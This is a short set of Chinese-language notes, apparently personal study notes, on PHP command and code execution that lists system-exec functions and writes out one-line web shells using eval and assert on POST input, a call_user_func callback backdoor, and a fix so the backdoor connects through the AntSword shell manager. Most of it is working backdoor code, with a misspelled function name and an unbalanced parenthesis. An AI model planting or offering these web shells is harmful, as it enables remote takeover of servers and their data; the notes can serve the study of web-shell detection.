1.系統命令執行? ?直接windows或liunx命令 各個程序 相應的函數 來實現

system exec shell_Exec passshru

2.執行代碼 eval assert php代碼 系統?

<?php eval($_POST)

<?php assert($_POST)

簡單的測試

回調后門函數call_user_func(1,2)

1是回調的函數

2是回調的參數

<?php
call_user_func('assert',$_REQUEST['pass']);

可以接get，post傳參

這樣一個函數可以執行我們的命令

可以執行我們的php代碼就可以執行系統命令

那我們考慮如何執行我們的后門

執行一句話pass傳入

$_POST[123]

就會形成

assert($_POST[123])?

用antsword進行連接嘗試這個后門是否可以執行

但是用這個一句話執行不了

經過查閱發現assert是可以執行函數而不可以直接執行$_POST[123]

所以我們可以改一下

assert(eval($_POST[123])

這樣antsword就可以執行